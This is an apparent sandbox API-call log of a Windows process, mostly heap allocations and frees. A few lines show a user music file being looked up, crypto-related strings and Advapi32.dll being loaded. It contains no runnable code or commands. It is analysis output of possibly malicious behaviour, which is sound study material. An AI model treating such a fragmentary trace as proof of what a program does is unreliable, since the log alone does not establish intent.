RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c48 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ae8 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0246.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c38 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0246.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0246.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54710 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0246.073] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0246.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0246.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0246.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0246.074] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.074] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0246.075] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0246.075] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0246.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0246.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0246.076] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.076] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\psWdx1ftUz7.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf78c4360, ftCreationTime.dwHighDateTime=0x1d5e51b, ftLastAccessTime.dwLowDateTime=0xa8983f30, ftLastAccessTime.dwHighDateTime=0x1d5ef5b, ftLastWriteTime.dwLowDateTime=0xa8983f30, ftLastWriteTime.dwHighDateTime=0x1d5ef5b, nFileSizeHigh=0x0, nFileSizeLow=0xa0af, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="psWdx1ftUz7.m4a", cAlternateFileName="PSWDX1~1.M4A")) returned 0xa87590 [0246.077] FindClose (in: hFindFile=0xa87590 | out: hFindFile=0xa87590) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0246.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545f8 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.078] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.078] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0246.078] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ab0 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0246.078] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ab0 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0246.078] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0246.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0246.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0246.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0246.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0246.079] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0246.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0246.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0246.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.079] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0246.079] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0246.079] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0246.080] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0246.080] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0246.080] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0246.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a08 [0246.080] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0246.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0246.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a08 | out: hHeap=0x970000) returned 1 [0246.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0246.081] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0246.081] 